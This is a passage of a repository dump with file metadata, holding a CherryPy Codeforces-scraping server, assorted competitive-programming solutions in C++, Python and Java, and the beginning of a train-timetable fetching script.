x == 'tpl':\n return open(path + '/resources/' + x + '/' + y, 'r')\n if x == 'fonts':\n return open(path + '/resources/' + x + '/' + y, 'rb')\n return open(path + '/index.html', 'r')\n except:\n return open(path + '/index.html', 'r')\n\n @cherrypy.expose\n def comments(self, **kwargs):\n global commentsToServer\n return proceedArray(commentsToServer, **kwargs)\n\n @cherrypy.expose\n def blogs(self, **kwargs):\n global blogsToServer\n return proceedArray(blogsToServer, **kwargs)\n\n @cherrypy.expose\n def users(self, **kwargs):\n global usersToServer\n return proceedArray(usersToServer, **kwargs)\n\ndef updateRecentActions():\n print(\"updating recent actions\")\n url = 'http://codeforces.com/?locale=ru'\n parser = CodeForcesRecentActionsParser()\n data = requests.get(url)\n if data.status_code != 200:\n print(\"пицоооооооооооооооооооооооооооооооооооооооооооооооооооооооооооооооооооооооооооооооооооооооооооооооот\")\n else:\n parser.feed(data.text)\n print(\"updated recent actions\")\n return parser.recent\n\ndef parseBlog(blogId):\n print(\"parsing blog\", blogId)\n url = 'http://codeforces.com/blog/entry/' + blogId + '?locale=ru'\n parser = CodeForcesBlogParser(blogId)\n response = requests.get(url)\n if len(response.history) == 0 and response.status_code == 200:\n parser.feed(response.text)\n else:\n if response.status_code != 200:\n print(response.status_code, \" in \", blogId)\n else:\n print(response.history, \" in \", blogId)\n print(\"parsed blog\", blogId)\n\ndef dumpFile(x, f):\n qwer = open(path + '/' + f + '.json', 'w')\n qwer.write(json.dumps(x))\n qwer.close()\n\n\ndef updateBlogsFromRecentActions():\n while True:\n print(\"update blogs thread\")\n global recentBlogs\n global pool\n global commentsToServer\n global usersToServer\n global blogsToServer\n pool.map(parseBlog, recentBlogs)\n recentBlogs = set()\n\n commentsToServer = []\n for u, (x, y, z) in comments.items():\n commentsToServer.append({'count': y, 'username': x, 'commentId': u, 'postId' : z})\n commentsToServer = list(reversed(sorted(commentsToServer, key=lambda x: x[\"count\"])))\n i = 0;\n for comment in commentsToServer:\n i += 1\n comment['id'] = i\n\n\n usersToServer = []\n for name, count in users.items():\n if abs(int(count)) > MIN_RATING_TO_WATCH: # HERE\n usersToServer.append({'username': name, 'count': count})\n usersToServer = list(reversed(sorted(usersToServer, key=lambda x: x[\"count\"])))\n i = 0;\n for comment in usersToServer:\n i += 1\n comment['id'] = i\n\n\n blogsToServer = []\n for blogId, (count, name) in blogs.items():\n if abs(int(count)) > MIN_BLOG_TO_WATCH: # HERE\n blogsToServer.append({'username': name, 'count': count, 'postId': blogId})\n blogsToServer = list(reversed(sorted(blogsToServer, key=lambda x: x[\"count\"])))\n i = 0;\n for comment in blogsToServer:\n i += 1\n comment['id'] = i\n\n\n print(\"updated blogs thread\")\n dumpFile(commentsToServer, 'comments')\n dumpFile(usersToServer, 'users')\n dumpFile(blogsToServer, 'blogs')\n print(\"saved into comments.json blogs thread\")\n sleep(SLEEP_BIG_UPDATE)\n\n\ndef recentActionsThread():\n while True:\n print(\"recent blogs thread\")\n sleep(SLEEP_RECENT)\n global recentBlogs\n recentBlogs = recentBlogs.union(updateRecentActions())\n\ndef main():\n global recentBlogs\n global pool\n global commentsToServer\n global usersToServer\n pool = multiprocessing.Pool()\n\n # recentBlogs = json.loads(open('comments.json', 'r').read())\n recentBlogs = set()\n try:\n qwer = open(path + '/comments.json', 'r')\n wert = qwer.readline()\n commentsToServer = json.loads(wert)\n for comment in commentsToServer:\n comments[comment['commentId']] = (comment['username'], comment['count'], comment['postId'])\n qwer.close()\n except:\n print(42)\n # recentBlogs = set(map(str, range(1, 25000)))\n recentBlogs = recentBlogs.union(updateRecentActions())\n\n try:\n qwer = open(path + '/blogs.json', 'r')\n wert = qwer.readline()\n blogsToServer = json.loads(wert)\n for blog in blogsToServer:\n blogs[blog['postId']] = (blog['count'], blog['username'])\n except:\n print(\"ok\")\n\n try:\n qwer = open(path + '/users.json', 'r')\n wert = qwer.readline()\n usersToServer = json.loads(wert)\n for user in usersToServer:\n users[user['username']] = user['count']\n except:\n print(\"ok\")\n download1 = threading.Thread(target=updateBlogsFromRecentActions)\n download2 = threading.Thread(target=recentActionsThread)\n download1.start()\n download2.start()\n\n conf = {\n '/': {\n 'tools.sessions.on': True,\n 'cors.expose.on': True,\n },\n '/generator': {\n 'request.dispatch': cherrypy.dispatch.MethodDispatcher(),\n 'tools.response_headers.on': True,\n 'tools.response_headers.headers': [('Content-Type', 'text/plain')],\n },\n }\n cherrypy_cors.install()\n webapp = CodeForcesServer()\n cherrypy.response.headers[\"Access-Control-Allow-Origin\"] = \"*\"\n cherrypy.config.update({'server.socket_port': port, 'server.socket_host': host})\n cherrypy.quickstart(webapp, '/', conf)\n download1.join()\n download2.join()\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.30927833914756775, "alphanum_fraction": 0.34364262223243713, "avg_line_length": 16.636363983154297, "blob_id": "f462735944574f037b9e76159354dad6e7c66073", "content_id": "873dd89ae486e64b16e9e09226d4d8e7262daa33", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 582, "license_type": "no_license", "max_line_length": 38, "num_lines": 33, "path": "/trash/test.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <iostream>\n\nusing namespace std;\n\nvoid sort(int*);\n\nint main() {\n int a[12];\n int min; cin >> min;\n for (int i = 0; i < 12; i++)\n cin >> a[i];\n sort(a);\n int s = 0;\n int c = 0;\n while (s < min) {\n s += a[c++];\n }\n if (c > 12)\n c = -1;\n cout << c << endl;\n return 0;\n}\n\nvoid sort(int *a) {\n for (int i = 1; i < 12; i++) {\n for (int j = 0; j < 12-i; j++)\n if (a[j] < a[(j+1)]) {\n int temp = a[j];\n a[j] = a[(j+1)];\n a[(j+1)] = temp;\n }\n }\n}\n" }, { "alpha_fraction": 0.5652173757553101, "alphanum_fraction": 0.5652173757553101, "avg_line_length": 22, "blob_id": "c351e3b4da4133f3fa266113bafdab6caa62c1e8", "content_id": "df1ccdee31169f2856425fba8ac6c908ec04397a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 207, "license_type": "no_license", "max_line_length": 51, "num_lines": 9, "path": "/2020/back/D.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import json\n\nn, m = map(int, input().split())\ns = []\nfor i in range(n):\n s += json.loads(input())['offers']\n\ns.sort(key = lambda x: (x['price'], x['offer_id']))\nprint(json.dumps({'offers': list(s)[:m]}))\n" }, { "alpha_fraction": 0.4285714328289032, "alphanum_fraction": 0.4571428596973419, "avg_line_length": 16.399999618530273, "blob_id": "26d9494a499af727a1675775284b80f11371b7ad", "content_id": "d68a9a0c3aebe16a3957768974ba4a2f40eb4add", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 175, "license_type": "no_license", "max_line_length": 32, "num_lines": 10, "path": "/CodeForce/0589/I.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "n, k = map(int, input().split())\na = [0] * k\nr = map(int, input().split())\nfor x in r:\n a[x - 1] += 1\nans = 0\nk = n // k\nfor x in a:\n ans += abs(x - k)\nprint(ans // 2)\n\n" }, { "alpha_fraction": 0.5147058963775635, "alphanum_fraction": 0.5211396813392639, "avg_line_length": 21.66666603088379, "blob_id": "db03509b56b4f5ce8e26f4c6d806ce9492843d84", "content_id": "88cfa112fe20db06000ba60886f6ff7a8e465004", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1088, "license_type": "no_license", "max_line_length": 85, "num_lines": 48, "path": "/2014/gcj2014_1B/B.hpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#ifndef SOLUTION_HPP\n#define SOLUTION_HPP\n\n#include <bits/stdc++.h>\n#include <QTextStream>\n#include <QDebug>\n#define enter printf(\"\\n\")\n#define pb push_back\n#define ll long long\n#define fors(it, r) for (set<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forvit(it, r) for (vector<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forv(i, vector) for (int i = 0; i < vector.size(); i++)\n#define forn(i, n) for (int i = 0; i < n; i++)\n#define forn1(i, n) for (int i = 1; i < n; i++)\n#define fori(n) for (int i = 0; i < n; i++)\n#define forj(n) for (int j = 0; j < n; j++)\n#define vi vector<int>\n#define vll vector<long long>\n#define pii pair<int, int>\n\nusing namespace std;\n\nstruct Solution\n{\n int a, b, k;\n ll ans = 0;\n\n void input(QTextStream &in)\n {\n in >> a >> b >> k;\n }\n\n void solve()\n {\n forn(i, k)\n forn(q, a)\n forn(w, b)\n if ((q & w) == i)\n ans++;\n }\n\n void output(QTextStream &out)\n {\n out << ans << \"\\n\";\n }\n};\n\n#endif // SOLUTION_HPP\n" }, { "alpha_fraction": 0.4075492322444916, "alphanum_fraction": 0.4133843779563904, "avg_line_length": 21.755186080932617, "blob_id": "2cce6e8ff8cd537c85fb7d8bd540aa9a678a272a", "content_id": "0db42f96f24164c5ef6889b5d565556872783994", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 5484, "license_type": "no_license", "max_line_length": 94, "num_lines": 241, "path": "/CodeForce/0924/D.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.io.*;\nimport java.util.*;\nimport java.math.BigInteger;\nimport java.util.Map.Entry;\n\nimport static java.lang.Math.*;\n\npublic class D extends PrintWriter {\n\n long gcd(long a, long b) {\n return b == 0 ? a : gcd(b, a % b);\n }\n\n class Q implements Comparable<Q> {\n final long n, d;\n\n @Override\n public String toString() {\n // return n + \"/\" + d;\n return String.format(Locale.ENGLISH, \"%.3f\", 1.0 * n / d);\n }\n\n public Q(long n, long d) {\n\n if (d < 0) {\n d *= -1;\n n *= -1;\n }\n\n long g = gcd(abs(n), abs(d));\n\n this.n = n / g;\n this.d = d / g;\n }\n\n @Override\n public int hashCode() {\n return ((int) (d ^ (d >>> 32))) * 31 + ((int) (n ^ (n >>> 32)));\n }\n\n @Override\n public boolean equals(Object obj) {\n if (this == obj)\n return true;\n if (obj == null)\n return false;\n return eq(this, (Q) obj);\n }\n\n @Override\n public int compareTo(Q q) {\n return Long.compare(n * q.d, d * q.n);\n }\n }\n\n boolean eq(Q a, Q b) {\n return (a.n == b.n) && (a.d == b.d);\n }\n\n void add(int[] ft, int i, int value) {\n for (; i < ft.length; i |= i + 1) {\n ft[i] += value;\n }\n }\n\n int sum(int[] ft, int i) {\n int res = 0;\n for (; i >= 0; i = (i & (i + 1)) - 1) {\n res += ft[i];\n }\n return res;\n }\n\n void run() {\n\n int n = nextInt();\n int w = nextInt();\n\n Q[] l = new Q[n];\n Q[] r = new Q[n];\n\n for (int i = 0; i < n; i++) {\n int x = nextInt();\n int v = nextInt();\n\n l[i] = new Q(x, v - w);\n r[i] = new Q(x, v + w);\n\n // println(l[i] + \" \" + r[i]);\n }\n\n int m = 0;\n\n Q[] c = r.clone();\n Arrays.sort(c);\n\n int[] v = new int[n];\n\n for (int i = 1; i < n; i++) {\n if (!eq(c[i - 1], c[i])) {\n ++m;\n }\n v[i] = m;\n }\n ++m;\n\n int[] ft = new int[m];\n\n int[] cr = new int[n];\n\n for (int i = 0; i < n; i++) {\n cr[i] = v[Arrays.binarySearch(c, r[i])];\n }\n\n for (int i = 0; i < n; i++) {\n add(ft, cr[i], +1);\n }\n\n long ans = 0;\n\n Integer[] order = new Integer[n];\n\n for (int i = 0; i < n; i++) {\n order[i] = i;\n }\n\n Arrays.sort(order, new Comparator<Integer>() {\n @Override\n public int compare(Integer i, Integer j) {\n int cmp = l[i].compareTo(l[j]);\n if (cmp == 0)\n return r[j].compareTo(r[i]);\n else\n return cmp;\n }\n });\n\n for (int i : order) {\n int t = cr[i];\n add(ft, t, -1);\n\n long s = sum(ft, t);\n\n // println(i + \" \" + s);\n\n ans += s;\n }\n\n println(ans);\n\n }\n\n boolean skip() {\n while (hasNext()) {\n next();\n }\n return true;\n }\n\n int[][] nextMatrix(int n, int m) {\n int[][] matrix = new int[n][m];\n for (int i = 0; i < n; i++)\n for (int j = 0; j < m; j++)\n matrix[i][j] = nextInt();\n return matrix;\n }\n\n String next() {\n while (!tokenizer.hasMoreTokens())\n tokenizer = new StringTokenizer(nextLine());\n return tokenizer.nextToken();\n }\n\n boolean hasNext() {\n while (!tokenizer.hasMoreTokens()) {\n String line = nextLine();\n if (line == null) {\n return false;\n }\n tokenizer = new StringTokenizer(line);\n }\n return true;\n }\n\n int[] nextArray(int n) {\n int[] array = new int[n];\n for (int i = 0; i < n; i++) {\n array[i] = nextInt();\n }\n return array;\n }\n\n int nextInt() {\n return Integer.parseInt(next());\n }\n\n long nextLong() {\n return Long.parseLong(next());\n }\n\n double nextDouble() {\n return Double.parseDouble(next());\n }\n\n String nextLine() {\n try {\n return reader.readLine();\n } catch (IOException err) {\n return null;\n }\n }\n\n public D(OutputStream outputStream) {\n super(outputStream);\n }\n\n static BufferedReader reader;\n static StringTokenizer tokenizer = new StringTokenizer(\"\");\n static Random rnd = new Random();\n static boolean OJ;\n\n public static void main(String[] args) throws IOException {\n OJ = System.getProperty(\"ONLINE_JUDGE\") != null;\n D solution = new D(System.out);\n if (OJ) {\n reader = new BufferedReader(new InputStreamReader(System.in));\n solution.run();\n } else {\n reader = new BufferedReader(new FileReader(new File(D.class.getName() + \".txt\")));\n long timeout = System.currentTimeMillis();\n while (solution.hasNext()) {\n solution.run();\n solution.println();\n solution.println(\"----------------------------------\");\n }\n solution.println(\"time: \" + (System.currentTimeMillis() - timeout));\n }\n solution.close();\n reader.close();\n }\n}\n" }, { "alpha_fraction": 0.37792640924453735, "alphanum_fraction": 0.3913043439388275, "avg_line_length": 26.18181800842285, "blob_id": "b061b918e897651ffedfc34b0e44b81e0d79b751", "content_id": "11abfc479528d6693d1cfcf715f51f51e3844939", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 299, "license_type": "no_license", "max_line_length": 98, "num_lines": 11, "path": "/trains/train2015western/F.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "n = int(input())\na = []\nfor i in range(n):\n a.append(input())\nok = True\nfor i in range(n):\n for j in range(n):\n if a[i][j] == '*':\n if a[n - i - 1][n - j - 1] == '*' or a[j][n - i - 1] == '*' or a[n - j - 1][i] == '*':\n ok = False\nprint('YES' if ok else 'NO')\n" }, { "alpha_fraction": 0.4423697590827942, "alphanum_fraction": 0.45573997497558594, "avg_line_length": 17.860870361328125, "blob_id": "565d530bdd65cc2c95911c4849fd0b95b03cc3bd", "content_id": "d68203ffe73bad0b91ee99c5a0bcc1b40d2fb0d9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4338, "license_type": "no_license", "max_line_length": 163, "num_lines": 230, "path": "/CodeForce/0399/C.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\n\n#define enter printf(\"\\n\")\n#define pb push_back\n#define ll long long\n#define fors(it, r) for (set<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forvit(it, r) for (vector<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forv(i, vector) for (int i = 0; i < vector.size(); i++)\n#define forn(i, n) for (int i = 0; i < n; i++)\n#define forn1(i, n) for (int i = 1; i < n; i++)\n#define fori(n) for (int i = 0; i < n; i++)\n#define forj(n) for (int j = 0; j < n; j++)\n#define vi vector<int>\n#define vll vector<long long>\n#define pii pair<int, int>\n\nusing namespace std;\nint INF = 1000000007;\nstring FILENAME = \"input\";\nstring FILEINPUT = FILENAME;\n\nvoid writeln(int a);void writeln(int a, int b); void writeln(int a, int b, int c); void writeln(int a, int b, int c, int d); void writeln(vector<int>& a);\nvoid readln(int& a);void readln(int& a, int& b);void readln(int& a, int& b, int& c);void readln(int& a, int& b, int& c, int& d);void readln(vector<int>& a, int n);\n\nstruct graph\n{\n vector<vector<int>> edges;\n int n;\n graph(int n);\n graph(int n, int m);\n graph();\n void createGraph(int n);\n void add_edge(int u, int v);\n void add_or_edge(int u, int v);\n void writelnMatrix();\n void writeln();\n};\n\nint n, m, k;\nll N, M;\nvi a;\n\nll f(ll j)\n{\n ll q = m / (j + 2), w = m % (j + 2);\n return (ll) (N - j) * (N - j) + j - (ll) (q + 1) * (q + 1) * w - (ll) (q * q * (j + 2 - w));\n}\n\nvoid run()\n{\n readln(n, m);\n N = n, M = m;\n if (m == 0)\n {\n cout << N * N << endl;\n fori(n)\n printf(\"o\");\n return;\n }\n if (n == 0)\n {\n cout << -M * M << endl;\n fori(m)\n printf(\"x\");\n return;\n }\n ll ans = -10000000000000ll;\n int z = -1;\n for(ll i = 0; i < N; i++)\n {\n ll temp = f(i);\n if (ans < temp)\n ans = temp,\n z = i;\n }\n// writeln(z);\n cout << ans << endl;\n int te = 0;\n fori(z + 1)\n {\n int t = m/(z+2) + (bool)(i < m%(z+2));\n te += t;\n forj(t)\n printf(\"x\");\n if (i==0)\n forj(n-z)\n printf(\"o\");\n else\n printf(\"o\");\n }\n forj(m - te)\n printf(\"x\");\n}\n\nint main()\n{\n /*freopen(FILEINPUT.append(\".out\").c_str(), \"r\", stdin);\n string s;\n cin >> s;\n cin >> s;\n cin >> s;\n ll q = 0;\n ll i = 1, j = 0;\n while (i < s.size())\n {\n while (s[i] == s[i - 1])\n i++;\n q += (ll)(i - j) * (i - j) * (s[i - 1] == 'o' ? 1 : -1);\n j = i++;\n }\n cout << q << endl;*/\n //freopen(FILENAME.append(\".out\").c_str(), \"w\", stdout);\n run();\n return 0;\n}\n\ngraph::graph(int n)\n{\n this->n = n;\n edges.resize(n);\n int t;\n fori(n)\n {\n edges[i].resize(n);\n forj(n)\n readln(t),\n edges[i][j] = t == '1';\n }\n}\n\ngraph::graph(int n, int m)\n{\n this->n = n;\n edges.resize(n);\n int u, v;\n fori(m)\n readln(u, v),\n add_edge(u - 1, v - 1);\n}\n\nvoid graph::add_edge(int u, int v)\n{\n edges[u].pb(v);\n}\n\nvoid graph::add_or_edge(int u, int v)\n{\n edges[u].pb(v);\n edges[v].pb(u);\n}\n\ngraph::graph(){};\n\nvoid graph::createGraph(int n)\n{\n edges.resize(n);\n}\n\nvoid graph::writeln()\n{\n fori(n)\n forj(edges[i].size())\n ::writeln(i, edges[i][j]);\n}\n\nvoid graph::writelnMatrix()\n{\n fori(n)\n {\n forj(n)\n printf(\"%d \", edges[i][j]);\n printf(\"\\n\");\n }\n}\n\nvoid readln(vector<int> &f, int n)\n{\n int x;\n for (int i = 1; i <= n; i++)\n {\n readln(x);\n f.push_back(x);\n }\n}\n\nvoid writeln(vector<int> &f)\n{\n for (int i = 0; i < f.size(); i++)\n printf(\"%d%c\", f[i], i == f.size() - 1 ? '\\n' : ' ');\n}\n\nvoid writeln(int a)\n{\n printf(\"%d\\n\", a);\n}\n\nvoid writeln(int a, int b)\n{\n printf(\"%d %d\\n\", a, b);\n}\n\nvoid writeln(int a, int b, int c)\n{\n printf(\"%d %d %d\\n\", a, b, c);\n}\n\nvoid writeln(int a, int b, int c, int d)\n{\n printf(\"%d %d %d %d\\n\", a, b, c, d);\n}\n\nvoid readln(int &a)\n{\n scanf(\"%d\", &a);\n}\n\nvoid readln(int &a, int &b)\n{\n scanf(\"%d %d\", &a, &b);\n}\n\nvoid readln(int &a, int &b, int &c)\n{\n scanf(\"%d %d %d\", &a, &b, &c);\n}\n\nvoid readln(int &a, int &b, int &c, int &d)\n{\n scanf(\"%d %d %d %d\", &a, &b, &c, &d);\n}\n" }, { "alpha_fraction": 0.48558101058006287, "alphanum_fraction": 0.5029686093330383, "avg_line_length": 27.239521026611328, "blob_id": "e70a54620f20fea1b90235023928478566d6a9a7", "content_id": "6b9a0517c28e09eba8941c0d4531ddcb35164cb8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4716, "license_type": "no_license", "max_line_length": 174, "num_lines": 167, "path": "/CodeForce/1497/E1.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//linearSieve\nstruct linearSieve\n{\n vector<int> primes;\n vector<int> minPrime, prev;\n\n linearSieve(int N)\n {\n minPrime.resize(N, 0);\n prev.resize(N, 0);\n for (int i = 2; i < N; i++)\n {\n if (minPrime[i] == 0)\n primes.push_back(i),\n minPrime[i] = i;\n for (int prime : primes)\n {\n int temp = prime * i;\n if (temp < N && prime <= minPrime[i])\n minPrime[temp] = prime,\n prev[temp] = i;\n else\n break;\n }\n }\n }\n\n vector<pair<int, int>> foldedFactorization(int x)\n {\n vector<pair<int, int>> temp;\n int p = -1;\n int pp = -1;\n while (x > 1)\n {\n pp = p;\n p = minPrime[x];\n if (p != pp)\n temp.pb({p, 1});\n else\n temp.back().second++;\n x = prev[x];\n }\n return temp;\n }\n\n vector<int> divisors(int x, bool nonTrivial = true)\n {\n vector<int> ans;\n\n const vector<pair<int, int>>& fold = foldedFactorization(x);\n function<void(int, int)> gen = [&](int v, int j) {\n if (j == int(fold.size()))\n {\n if (!nonTrivial || (v != 1 && v != x))\n ans.pb(v);\n return;\n }\n gen(v, j + 1);\n fori(fold[j].second)\n gen(v *= fold[j].first, j + 1);\n };\n gen(1, 0);\n\n return ans;\n }\n\n vector<int> sortedDivisors(int x, bool nonTrivial = true)\n {\n vector<int> ans = divisors(x, nonTrivial);\n sort(ans.begin(), ans.end());\n return ans;\n }\n\n vector<int> factorization(int x)\n {\n vector<int> temp;\n while (x > 1)\n temp.push_back(minPrime[x]),\n x = prev[x];\n return temp;\n }\n\n bool isPrime(int x)\n {\n return minPrime[x] == x;\n }\n};\n\n//}}}\n\nlinearSieve s(10000001);\n\nvoid run()\n{\n ints(n, k);\n vi a(n);\n readln(a);\n set<int> cur;\n int ans = 0;\n for (int& x: a)\n {\n auto f = s.foldedFactorization(x);\n int temp = 1;\n for (auto& [k, v]: f)\n if (v % 2)\n temp *= k;\n if (cur.find(temp) != cur.end())\n ans++,\n cur = set<int>();\n cur.insert(temp);\n }\n writeln(ans + 1);\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n ints(t); fori(t) run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.417827308177948, "alphanum_fraction": 0.4261838495731354, "avg_line_length": 20.75757598876953, "blob_id": "642fe20bec841134a498023c2f55b5bd706a2952", "content_id": "8781a2d568296cb08afb237d658d3722105365a6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 718, "license_type": "no_license", "max_line_length": 50, "num_lines": 33, "path": "/TopCoder/TCO/300.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\n\n#define fori(n) for(int i = 0; i < (int) (n); i++)\n#define forj(n) for(int j = 0; j < (int) (n); j++)\n\nusing namespace std;\n\nclass ModModMod \n{\n set<int> ss;\n long long f(long long x)\n {\n auto temp = ss.lower_bound(-x);\n if (temp == ss.end())\n return x;\n return f(x % (-*temp));\n }\npublic:\n long long findSum(vector <int> m, int R) \n {\n int n = m.size();\n long long ans = 0;\n int last = m[0];\n ss.insert(-last);\n for (int i = 1; i < n; ++i)\n if (m[i] < last)\n ss.insert(-m[i]),\n last = m[i];\n fori(R + 1)\n ans += f(i);\n return ans;\n }\n};\n" }, { "alpha_fraction": 0.5, "alphanum_fraction": 0.5379746556282043, "avg_line_length": 30.600000381469727, "blob_id": "a5d5841100b892aab5b61839da11821d91c3feab", "content_id": "600db576399134a1f22d6eca3f274bf240c2998b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 158, "license_type": "no_license", "max_line_length": 60, "num_lines": 5, "path": "/CodeForce/0847/M.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "input()\na = list(map(int, input().split()))\ndiffs = [a[n] - a[n - 1] for n in range(1, len(a))]\n\nprint((a[-1] + diffs[0]) if len(set(diffs)) == 1 else a[-1])\n" }, { "alpha_fraction": 0.5411442518234253, "alphanum_fraction": 0.5490464568138123, "avg_line_length": 43.350467681884766, "blob_id": "3d30340775de8a755b37518aa10f250c0e1a53fa", "content_id": "062f25e1110fdb8e10d1e89174dbe49f39fddc51", "detected_licenses": [ "WTFPL" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10010, "license_type": "permissive", "max_line_length": 417, "num_lines": 214, "path": "/timetable/timetable", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\nimport click\nimport click_completion\nimport click_completion.core\n\nfrom collections import defaultdict\nimport re\nimport sys\nimport os\nimport getopt\nimport requests\nimport subprocess\nimport datetime\n\nDATE_FORMAT = '%d.%m.%Y'\nPATH = os.path.dirname(os.path.abspath(__file__))\nclick_completion.init()\n\[email protected]()\ndef completion():\n pass\n\[email protected]()\[email protected]('--append/--overwrite', help=\"Append the completion code to the file\", default=None)\[email protected]('-i', '--case-insensitive/--no-case-insensitive', help=\"Case insensitive completion\")\[email protected]('shell', required=False, type=click_completion.DocumentedChoice(click_completion.core.shells))\[email protected]('path', required=False)\ndef install(append, case_insensitive, shell, path):\n shell, path = click_completion.core.install(shell=shell, path=path, append=append)\n click.echo('%s completion installed in %s' % (shell, path))\n\nclass dotdict(dict):\n __getattr__ = dict.get\n __setattr__ = dict.__setitem__\n __delattr__ = dict.__delitem__\n \ndef getStations():\n file = open(os.path.join(PATH, 'stations.in'), 'r')\n stationById = defaultdict(list)\n idByStation = defaultdict(list)\n all = []\n for string in file:\n l = string[:-1].rsplit(' ', 1)\n stationById[l[1]].append(l[0])\n idByStation[l[0]].append(l[1])\n all.append(l[0])\n file.close()\n return stationById, idByStation, all\n\ndef getMins(date):\n return int(date[0:2]) * 60 + int(date[3:5])\n\ndef getDate(mins):\n hours = mins // 60\n mins %= 60\n res = ''\n if hours != 0: res += str(hours) + ' ч'\n if mins != 0: res += str(mins) + ' м'\n return re.sub(r'ч(\\d)', r'ч \\1', res)\n\ndayReplacers = [ ('по пятницам и выходным', 'ПСВ'), ('по пятницам и воскресеньям', 'ПВ'), ('по пятницам и субботам', 'ПС'), ('ежедневно', ''), ('по выходным', 'СВ'), ('по рабочим', 'КСВ'), ('по воскресеньям', 'В'), ('по субботам', 'С'), ('по пятницам', 'П'), ('кроме пятн\\. и субб\\.', 'КПС'), ('кроме пятниц и вых\\.', 'КПСВ'), ('кроме четвергов и вых\\.', 'КЧСВ'), ('кроме суббот', 'КС'), ('кроме воскресений', 'КВ') ]\nplaceReplacers = [ ('Красное Село', 'КрСело'), ('Лигово', ''), ('Калище', ''), ('Лебяжье', ''), ('Ораниенбаум-1', ''), ('Новый Петергоф', ''), ('Гатчина Балтийская', 'Г'), ('Гатчина Варшавская', 'Г'), ('Зеленогорск', 'Зел'), ('Кирилловское', 'Кир'), ('Каннельярви', 'Кан'), ('Рощино', 'Рощ'), ('Выборг', 'Выб'), ('Гаврилово', 'Гав'), ('Советский', 'Сов'), (r'Санкт-Петербург-.*?(\\s|$)', r'\\1') ]\ndaysSorter = { '': 0, 'К': 1, 'П': 2, 'С': 3, 'В': 4 }\n\ndef replacer(s, repl):\n for what, how in repl: s = re.sub(what, how, s)\n return s\n\ndef getTimetable(fro, to, date):\n for idFrom in fro:\n for idTo in to:\n try:\n x = requests.get('https://www.tutu.ru/spb/rasp.php?st1={}&st2={}&json&date={}'.format(idFrom, idTo, date)).json()\n if 'error' in x:\n print(x['error'], file = sys.stderr)\n else:\n return x\n except:\n print('No route from {} to {}'.format(idFrom, idTo))\n raise Exception('No 